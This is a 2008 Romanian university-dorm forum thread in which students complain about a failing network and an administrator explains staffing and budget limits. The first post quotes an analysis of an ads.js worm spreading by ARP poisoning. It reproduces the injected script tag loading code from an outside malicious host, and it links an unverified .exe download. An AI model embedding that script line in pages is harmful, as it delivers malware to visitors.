SA VA FIE RUSINE!

anunturi, tehnicals, info

Cand credeti ca va merge netul bine?

Poll ended at Sun Feb 17, 2008 6:25 pm

eu zic ca e o problema cu serverul, sunt administratori care se ocupa de noi, doar i-am platit, merg torentele macar... nu stiu, ma astept diseara sau maine....
0
No votes
eu zic ca ne-au abandonat adminii, netul va merge bine, dar peste saptamani, sau chiar mai repede daca ne abonam la altceva...
0
No votes
eu zic ca netul nu va merge mai bine deloc, tinand cont ca problema asta este din octombrie (deci de 5 LUNI) si netul a mers tot mai prost, eu spun ca se va pastra acest trend, maine va fi mai rau
3
43%
indecis, poate cate ceva din toate variantele
4
57%
 
Total votes: 7

User avatar
gurmandul
Posts: 4
Joined: Fri Feb 08, 2008 4:03 am

SA VA FIE RUSINE!

Postby gurmandul » Sun Feb 10, 2008 6:25 pm

Am sa trec direct la obiect. Ceea ca urmaresc prin acest mesaj esteo reactie din partea administratorilor (nu ne mai tineti pe intuneric, ca nu suntem copii, este vorba de o problema tehnica de server sau nu se ocupa nimeni de reteaua existenta) si reactii din partea celorlalti colegi de suferinta, poata va identificati, cine stie? :dizzy:

Faza este ca netul pica la 5 minute :hammer: e mort, caput :priest: , noaptea merge intradevar mai bine, dar nu se rezolva problema in totalitate. Dupa ce ii dai repair, daca esti norocos isi revine, dar prima pagina de explorer web iti face redirect la:

Code: Select all

http://g.asdafdgfgf.com/ads.js

Cum se comporta acest virus? Dupa cum m-am documentat, cel mai aproape de adevar mi se pare urmatoarea afirmatie:
pot sa confirm ca problema e aparuta si in Iasi, in reteaua UAIC, in toate caminele universitare. Ca sa nu va mai dati cu parerea ca este din cauza nustiu carei treaba de pe calculator, cauza este urmatoarea (determinata si cu ajutorul catorva amici de la bitdefender): Un calculator cu windows este infectat cu viermele in cauza prin intrarea pe o pagina care contine ads.js (cel de mai jos). acest javascript instantiaza niste obiecte ActiveX, si foloseste cateva exploituri la windows (De ex cursor exploit, un exploit real player, si inca vreo 3 sau 4 exploituri cunoscute la windowsul updatat la zi), si downloadeaza o serie de alte javascripturi si un program ads.exe. Dupa rularea codului pe masina infectata,

Code: Select all

<script LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>

procesul se instaleaza ca serviciu, si porneste infectarea celorlalte calculatoare de pe retea, printr-o metoda inca necunoscuta (probabil ARP man in the midle?) . Motivul pt care credem ca este vorba de arp poisoning este numarul IMENS de cereri ARP care se efectueaza pe retea. Intr-o dimineata de luni, la ora 11, se efectuau 1000 de cereri ARP in 0,001 secunde. Din cauza faptului ca injectia scriptului in pagini este cauzata de celelalte calculatoare pe retea, se pot trage concluziile: 1. ISP-ul nu are cum sa ajute, fiind o problema in interiorul retelei, si nu pe gateway sau upstream, 2. Nici un sistem nu este imun la js-ul in cauza: pana si sistemele pe linux, cu firewall, au js-ul infectat in unele pagini pe care intra. Singura solutie momentan ar fi identificarea celor care fac ARP flood pe retea, ceea ce se face usor cu un sniffer, si instalarea unui antivirus/anti-spyware pe ele.

http://forum.softpedia.com/index.php?showtopic=334580

Acum problema este mult mai complexa, majoritatea antivirusurilor la zi updatate nu detecteaza uploaderul, cele cu rezultate mai bune si care se gasesc mai peste tot par a fi Bitdefender sau Kaspersky cu update la zi. Sistemul de operare nu conteaza din cate se vede (Windows sau Linux) e aceeasi caterinca (dovada la forumul Ubuntu:http://ubuntuforums.org/showthread.php?t=672247). Problema apare in retele mari si se pare ca ROEDU are lipici pt asa ceva. XXbuzzsaw.gif

Dupa ce am detectat virusul, am dat format total/reinstalat WIN XP/ pus BITDEF 10 Internet Security update la zi si tot primeam atacuri la 2 ore dupa ce am terminat toate operatiile :shock: . Cu ajutorul unor utilitare pe care ar trebui sa le aiba un administrator de retea pentru a monitoriza traficul, am observat:

intre 200 si 700 de atacuri ARP-based in 1.1367 sec, ceea ca inseamna 34-89% din traficul total


Desigur pasul urmator a fost unul logic, sa caut un sniffer bun sa vad ipurile care trimit aceste broadcasturi. Rezultatul a fost ingrijorator:ip-urile nu au incaput pe o pagina 5obsessed.gif . Mostra din care trebuie sa eliminati gateway-ul 10.128.0.1
Image

pentru cine vrea utilitarul, accesatihttp://www.netoptima.in/ARProtect_Setup_0.12.15.exe

ACUM, eu zic ca asta e o problema MARE si denota angajamentul 0 al unor oameni care trebuiau sa se ocupe ca asa ceva sa nu se intample. Am vorbit cu administratorul de la noi din camin: a ridicat usor din umeri si a spus ca nu are ce sa faca, ca sunt multi in retea care nu au antivirus (dohhh! intro retea mare sa nu existe un virus,trojan ceva e curata utopie bduh.gif )si ca
asta e! Chestia asta eu zic ca se poate face printrun management bun al routerelor, toata atacurile ar putea fi directionate spre un singur calculator, se poate taia accesul la net dinspre calculatoarele infectate dar ceva imi spune ca nu lipsa de timp sau de bani ar fi problema.

Ca sa inchei, am deschis un pool pentru 7 zile sa vad ce parere aveti....
Image
"Specializarea este pentru insecte, oamenii ar trebui sa fie in stare de orice."

transcend2005
newbie
newbie
Posts: 7
Joined: Tue Jan 17, 2006 4:58 pm
Contact:

Re: SA VA FIE RUSINE!

Postby transcend2005 » Sun Feb 10, 2008 6:52 pm

CE MAMA DRACU FAC ASTIA CU INTERNETU ? DA' CHIAR ASA ... DACA CEI CARE SUNT RESPONSABILI CU RETEAUA/INTERNETUL NU SE DECURCA DE CE NU ANGAJAM PE CINEVA SA NE REPARE RETEAUA, SA CONFIGUREZE CALUMEA CE E DE CONFIGURAT ... DACA AR DA FIECARE STUDENT CATE 5 RON ....
PARTEA PROASTA E CA NICI NU PUTEM SA LUAM INTERNET PRIN CABLU DIN ALTE PARTI DECAT ******** DE WIRELESSURI ZAPP SAU ORANGE ... AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

mamamia

Re: SA VA FIE RUSINE!

Postby mamamia » Sun Feb 10, 2008 10:31 pm

Daca medicinisti au impresia ca sunt si ingineri, trebuie sa suferim si noi pentru "stiinta lor", doar sunt atotcunoscatori. Totusi ar trebui sa caute un student de la poli si sa-l plateasca sa ne faca reteaua, mai ales ca ne au luat bani, netul de la ROEDU fiind gratis.

Nashul
junior
junior
Posts: 41
Joined: Sun Mar 04, 2007 10:19 pm
Location: undeva in Univers

Re: SA VA FIE RUSINE!

Postby Nashul » Sun Feb 10, 2008 11:56 pm

Sunt de acord cu faptul ca serverul nu mai face fatza la noile cerintze(numarul de conexiuni la internet a crescut in ultimul timp), deci trebuie inlocuit. Insa va pot spune ca anul trecut am scanat un calculator cu avira free edition si am gasit aproximativ 2000 de troieni. Pe acel calculator era instalat un antivirus care expirase...In aceasta retea sunt multe calculatoare pline de virusi. Am mai spus asta si anul trecut. Daca serverul "problema" face legatura cu ROEDU, deci prin acel server avem internet(adica face legatura cu exteriorul retelei), atunci conexiunea intre calculatoarele din retea, cu ajutorul hubului RSM, se face prin SWITCH-uri...deci nu prin server.Si se observa ca la ore de varf se copiaza cu viteze mici intre calculatoarele din retea. Asta deoarece virusii din calculatoarele infectate "omoara" atat SWITCH-urile cat si serverul(care deja este insuficient...). De aceea fac apel la toti cei care nu au instalat un antivirus pe calculator, sa instaleze macar o versiune free. Aveti aici niste link-uri de unde puteti downloada versiuni free:
http://www.softpedia.com/progDownload/A ... -6527.html
http://free.grisoft.com/doc/5390/us/frt/0?prd=aff
http://free.grisoft.com/doc/5390/us/frt/0?prd=asf
http://free.grisoft.com/doc/5390/us/frt/0?prd=arw
"Ei doar au stele cu noroc
Si prigoniri de soarte,
Noi nu avem nici timp, nici loc,
Si nu cunoastem moarte."

User avatar
Dan
Master of Disaster
Posts: 2869
Joined: Sun Jul 06, 2003 1:59 am
Location: ...on the highway to hell...
Contact:

Re: SA VA FIE RUSINE!

Postby Dan » Tue Feb 12, 2008 9:33 pm

pe scurt: nu lipsa de bani e problema ci lipsa de oameni si timp - asta cu toate investitiile facute anul trecut in renovarea infrastructurii ( facuta exclusiv din banii de taxe - nu ca la poli cu bani de la minister ) si contractul de carrier pentru Grozavesti, care nu e chiar ieftin.

Nu sunt insa atatia bani incat sa populam macar fiecare camin cu un device layer 3 - eventual cu DHCP snooping pe el - si care ar rezolva problema de la radacina.

Asadar voluntarii si competentii sunt intotdeauna bine veniti. Am observat insa cu prilejul suspendarii conexiunii caminelor E, B1, B2 ca initiativa se reduce - ca si acum- la a face galagie pe hol si la initiative care isi gasesc sfarsitul in 24 de ore.

2. Userul care tocmai si-a luat o vista nou nouta de la emag pricepe foarte greu - chiar si acum - sa-si puna un antivirus, sa-l updateze sau sa puna windoaza pe automatic updates. .js ? - ce-i aia ? Culturalizare cu forta nu se poate. El stie sa vina sa tipe ca i s-a taiat netu', dar nu face nimic in sensul remedierii situatiei. Rezultatul - asta de acu'

3. Foarte posibil ca in viitorul apropiat problema cu viteza traficului sa se rezolve pentru ca existe semne clare ca traficul P2P sa fie complet suspendat. Probabil vom ramane cu un acces http simplu si cam atat.

4. Daca aveti oferte de oameni care sa lucreze platiti - asteptam CV + pretentii salariale la admin@imed.ro.
Eu din muntii mei...
http://www.imed.ro/forum

User avatar
Dan
Master of Disaster
Posts: 2869
Joined: Sun Jul 06, 2003 1:59 am
Location: ...on the highway to hell...
Contact:

Re: SA VA FIE RUSINE!

Postby Dan » Tue Feb 12, 2008 9:43 pm

Apropo - iar pica netu' in seara asta pentru ceva revizii... :wink:
Eu din muntii mei...
http://www.imed.ro/forum

User avatar
gurmandul
Posts: 4
Joined: Fri Feb 08, 2008 4:03 am

Re: SA VA FIE RUSINE!

Postby gurmandul » Tue Feb 12, 2008 9:53 pm

Ok, mersi de sinceritate, chiar si asa vreau sa cred ca se puteau face mai multe. De exemplu, nashul a spus de calculatorul scanat anul trecut...ce s-a mai intamplat de atunci? au intrat adminii la hibernat? ca pe bune daca se mai stiu de vreunul care sa fie deconectat pe motiv ca are calculatorul rezidenta de virusi.

Intradevar, majoritatea nu stiu nimic dar tipa, se agita, injura si realizez ca e rau si sa le explici: ii intereseaza doar sa mearga. Cred ca e greu sa le si explici: cineva spunea ca a taiat netul adminului de vreo 3 ori....Acum daca lipsa de bani nu e o problema si daca fiecare admin are un sniffer, cred ca se poate face treaba sa eliminati de la net pe cei care sunt responsabili de viteza asta de melc a netului. Adica, maine de exemplu e ziua Z, toti adminii fac o scanare si cei care nu sunt ok, scoasa mufa...

Pe urma li se va recomanda format+antivirus+update si apoi i se va da drumul.Cand are iar probleme, iar sa fie scos si asa pana invata drq ca pc-ul nu e gratar.

Si asa netul va merge ok maine seara. Adica nu mi se pare normal ca cei care stiu sa foloseasca un calculator, care au sistemul curat, cu antivirus la zi, update, anti-spyware si firewall capabil sa sufere pentru idiotul care a luat vista si altii ca el. Pentru ca AIM ar trebui sa ofere net celui care nu ii va supraincarca reteaua si va fi un focar de infectie pentru atatea camine.

Si, Dane, doar http nu stiu daca e cea mai buna solutie si puneti fratilor un mesaj si pe splash screen la odc daca mai aveti nevoie de oameni. Or fi care stiu si care chiar s-au saturat sa nu le mearga netul luni intregi si nici sa nu stie ce se intampla (a se vedea enemy). Cat despre uite-i banii, uite-i nu-s...acelasi lucru, faceti un apel, ca decat sa ne tragem wireless mai bine cotizam cu inca ceva aici, dar stim ca facem treaba buna...
Image
"Specializarea este pentru insecte, oamenii ar trebui sa fie in stare de orice."

User avatar
Dan
Master of Disaster
Posts: 2869
Joined: Sun Jul 06, 2003 1:59 am
Location: ...on the highway to hell...
Contact:

Re: SA VA FIE RUSINE!

Postby Dan » Tue Feb 12, 2008 10:21 pm

La fel - nu poti sa-i tai netu' prea mult pentru ca ...."a platit ". Nu ma crezi ? Fa o excursie in E, bate la una din 2 usi si explica-le ca sunt virusati. Incep sa cred ca managementul din caminele Universitatii ar fi unul foarte potrivit si pentru noi - nu ma refer chiar la toate aspectele ci la cele legate de useri.

Politica de care zici tu am aplicat-o anul trecut vreo 2-3 luni - a iesit un tambalau si mai mai sa ne luam la bataie cu ei. Am avut parte personal de atitudini de genu asta - si pe scurt- nimeni n-are chef de internari pentru un net taiat. Punct.

Problema aici e umana - si greu de gasit solutii tehnice care sa le rezolve : atat de motivat omusorii care se ocupa de retea ( si care s-au saturat sa le bata lumea la usa non stop ), cat si userii care nu-i intereseaza.

Asteptam tineret mandria tarii sa reconstruiasca comunismu' pe care noi l-am daramat...
Eu din muntii mei...
http://www.imed.ro/forum

User avatar
gurmandul
Posts: 4
Joined: Fri Feb 08, 2008 4:03 am

Re: SA VA FIE RUSINE!

Postby gurmandul » Tue Feb 12, 2008 11:01 pm

true... :help:
si totusi :) asa ar fi normal: ca cei care sunt responsabili sa fie deconectati...

Chiar si asa, nimeni nu te poate opri sa strangi niste fonduri tocmai pentru a remedia problema, cat despre resursa umana, incearca sa faci rost de ea: in primul rand sunt 20 de useri care stiu de topicul asta, pune un anunt pe dc, poate sunt oameni care vor sa se implice...

si multa bafta, dar tine cont ca pe cat problema asta persista, u&co sunteti persona non grata

tot timpul am spus despre studenti: poti sa iei apa, gazul, mobila, dar niciodata sa nu iei netul sau curentul, ca ai dat de dracu!

Cheers!
Image
"Specializarea este pentru insecte, oamenii ar trebui sa fie in stare de orice."

User avatar
Dan
Master of Disaster
Posts: 2869
Joined: Sun Jul 06, 2003 1:59 am
Location: ...on the highway to hell...
Contact:

Re: SA VA FIE RUSINE!

Postby Dan » Fri Feb 15, 2008 2:02 am

Politica pe care o vom pastra e sa nu impunem taxe suplimentare la userii vechi inafara de taxa pe vara. Toate investitiile in infrastructura se fac pe baza celor noi intrati in retea - de bine de rau cel putin partea de cablaraie e facuta - deci aici cheltuieli real nu prea sunt ( e o sarma pe care daca nu pune iuzaru patu pe ea nu o schimbi prea des ), un switch e destul de ieftin - in fine. Daca era de exemplu sa nu avem bani pentru Grozavesti si sa strangem bani - aveau net pe la anu in octombrie probabil.

Legat de implicare - am lasat o adresa de mail - 0 new messages si nu sunt optimist de vreun fel.
Dupa cum vezi nici macar poll-ul nu starneste mare interes - merge YM si pot da cu audibles sa auda si vecinu' ? E ok...Pe oameni nu se informeaza / nu-i intereseaza. So oricum nu de putine ori am fost intrebati de ce nu merge netu' cand curentul era picat pe jumatea din fata a caminului... :roll:
Eu din muntii mei...
http://www.imed.ro/forum

User avatar
Dan
Master of Disaster
Posts: 2869
Joined: Sun Jul 06, 2003 1:59 am
Location: ...on the highway to hell...
Contact:

Re: SA VA FIE RUSINE!

Postby Dan » Fri Feb 15, 2008 2:03 am

AAA ...am gasit pe unu care a recunoscut ca s-a saturat sa fure maci si vrea sa plateasca - vreti sa stiti unde sta ? :devil:
Eu din muntii mei...
http://www.imed.ro/forum

User avatar
gurmandul
Posts: 4
Joined: Fri Feb 08, 2008 4:03 am

Re: SA VA FIE RUSINE!

Postby gurmandul » Tue Mar 25, 2008 9:20 pm

frate, nush ce sa zic, dar eu nu am mai avut acces la forum de la ultimul reply cam, bine nici nu am incercat in fiecare zi....
Image
"Specializarea este pentru insecte, oamenii ar trebui sa fie in stare de orice."

User avatar
Dan
Master of Disaster
Posts: 2869
Joined: Sun Jul 06, 2003 1:59 am
Location: ...on the highway to hell...
Contact:

Re: SA VA FIE RUSINE!

Postby Dan » Thu Mar 27, 2008 3:06 am

Da -n-ai avut pentru ca a trebuit redirectat DNS - daca nu faceam asta pe serverul vechi - il lua dracu la propriu. Era disponibil via proxy extern sau cu primul DNS pe 10.128.0.2. Oricum de saptamana asta, odata cu vlanurile, cu finalizarea lucrarilor in 6 camine din cele 10 incepem sa mai investim in "scule".
Daca policy-ul va fi mai strict, ceea ce intentionam sa facem, probabil ca vor aparea in continuare vociferari si comentarii, dar lucrurile vor merge mai bine.
Angajez bodyguard :D - please PM
Eu din muntii mei...
http://www.imed.ro/forum


Return to “Reteaua”

Who is online

Users browsing this forum: No registered users and 8 guests